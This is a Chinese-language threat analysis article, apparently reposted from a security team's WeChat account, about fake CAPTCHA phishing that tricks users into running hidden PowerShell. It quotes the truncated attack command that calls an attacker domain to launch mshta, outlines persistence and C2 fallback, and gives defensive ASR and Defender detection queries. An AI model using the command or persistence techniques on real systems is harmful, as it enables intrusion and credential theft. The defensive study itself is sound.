警惕新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析

admin 2025年2月22日20:13:52评论21 views字数 1347阅读4分29秒阅读模式

一、事件背景

警惕新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析

        攻击者以"CAPTCHA验证"(验证码校验)为诱饵,诱导用户执行恶意PowerShell指令,通过多阶段隐蔽加载技术实施网络攻击。

二、攻击链技术解析

1. 初始攻击向量

powershell -w 1 -C "$l='https://pajmina.store/...';Invoke-CimMethod ..."
  • 窗口隐藏参数-w 1使PowerShell窗口处于隐藏状态

  • 字符串混淆('ms' + 'hta' + '.exe')规避基础字符串检测

  • CIM/WMI调用:使用Invoke-CimMethod替代传统Start-Process,绕过部分行为监控

2. 载荷投递阶段

组件
技术细节
规避检测手段
mshta.exe 
执行远程HTA应用
白名单程序滥用
.m4a扩展名
伪造成音频文件的恶意脚本
文件类型混淆 
域名策略 使用新注册的.store域名 规避信誉评分系统 

3. 持久化机制

攻击成功后会建立以下持久化通道:

  1. 注册表自启动项:HKCUSoftwareMicrosoftWindowsCurrentVersionRun

  2. 计划任务创建:每小时检测载荷有效性

  3. 备用C2服务器轮询:包含3个备用域名解析

三、攻击危害评估

1. 直接威胁

  • 远程代码执行(RCE):可部署Cobalt Strike等攻击框架

  • 凭据窃取:Hook浏览器内存读取Cookie/密码

  • 横向移动:利用WMI进行内网渗透

四、防御方案建议

1. 预防措施

# 启用攻击面缩减规则(ASR)
Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
  • 应用控制策略:限制PowerShell执行未签名脚本

  • 网络分段:对WMI流量实施TCP 135端口监控

  • 邮件网关:配置MIME类型过滤规则阻断.m4a/.hta

2. 检测方案

// Microsoft Defender高级查询
DeviceProcessEvents
| where FileName in~ ("mshta.exe", "powershell.exe")
| where ProcessCommandLine has_any (".m4a", "Invoke-CimMethod", "-WindowStyle Hidden")

3. 应急响应流程

  1. 内存取证:使用Volatility提取恶意进程

  2. 网络取证:分析DNS查询记录定位C2

  3. 磁盘取证:检索$MFT时间线追踪攻击路径

五、案例还原与启示

本次事件中攻击者使用了三阶段混淆技术

  1. 社会工程层:伪造CAPTCHA验证UID提升可信度

  2. 执行层:分离式命令拼接绕过基础HIDS检测

  3. 载荷层:HTA文件嵌套JavaScript加载Shellcode

该案例验证了MITRE ATT&CK框架中的:

  • T1059.001(命令行接口)

  • T1218.005(Mshta滥用)

  • T1047(WMI利用)

六、建议

  • 验证所有"系统验证"请求的真实性

  • 警惕非常规域名(如.store/.top等新gTLD)

  • 禁用Windows默认的自动执行功能

原文始发于微信公众号(Khan安全团队):警惕新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月22日20:13:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   警惕新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析https://cn-sec.com/archives/3769486.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息